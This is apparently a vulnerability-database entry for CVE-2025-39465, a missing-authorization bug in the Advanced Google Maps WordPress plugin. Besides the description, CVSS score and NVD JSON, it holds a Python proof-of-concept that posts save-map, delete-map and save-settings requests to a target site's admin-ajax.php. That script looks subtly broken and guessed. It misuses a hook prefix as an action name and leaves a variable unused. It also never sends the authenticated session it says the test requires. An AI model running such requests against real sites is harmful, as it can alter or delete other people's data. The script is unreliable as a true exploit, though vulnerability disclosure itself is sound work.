Security Vulnerability Report
中文
CVE-2025-39465 CVSS 4.3 MEDIUM

CVE-2025-39465

Published: 2025-11-06 16:15:51
Last Modified: 2026-04-27 19:16:13

Description

Missing Authorization vulnerability in flippercode Advanced Google Maps wp-google-map-gold allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced Google Maps: from n/a through <= 5.8.4.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Advanced Google Maps (wp-google-map-gold) <= 5.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-39465 PoC - WordPress Advanced Google Maps Missing Authorization # Target: WordPress site with wp-google-map-gold plugin <= 5.8.4 import requests import sys from urllib.parse import urljoin def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-39465 """ # Get WordPress nonce for authenticated requests wp_nonce_url = urljoin(target_url, '/wp-admin/admin-ajax.php?action=wp_ajax_nopriv_agm_map_builder_get_map') # Target endpoint that may be missing authorization target_endpoint = urljoin(target_url, '/wp-admin/admin-ajax.php') # Low-privilege user session (subscriber role) headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } # Test unauthorized access to map management functions # This PoC attempts to access admin functionality as low-privilege user test_payloads = [ 'action=agm_map_builder_save_map&nonce=test&map_data=test', 'action=agm_map_builder_delete_map&id=1', 'action=agm_google_maps_save_settings&settings=test' ] print(f"[*] Testing target: {target_url}") print(f"[*] Plugin: Advanced Google Maps <= 5.8.4") print(f"[*] Vulnerability: Missing Authorization (CVE-2025-39465)") print("-" * 60) # Note: Replace with actual authenticated session cookie for low-privilege user # cookies = {'wordpress_test_cookie': 'WP+Cookie+check', 'wordpress_logged_in_cookie': '...'} for payload in test_payloads: try: response = requests.post(target_endpoint, data=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[!] Possible vulnerable endpoint: {payload.split('&')[0]}") print(f" Response: {response.text[:200]}...") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] PoC completed. Manual verification required.") print("[*] Recommended: Use authenticated low-privilege session to test.") if __name__ == '__main__': if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://example.com/")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39465", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:50.700", "lastModified": "2026-04-27T19:16:13.167", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in flippercode Advanced Google Maps wp-google-map-gold allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced Google Maps: from n/a through <= 5.8.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-google-map-gold/vulnerability/wordpress-advanced-google-maps-plugin-5-8-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}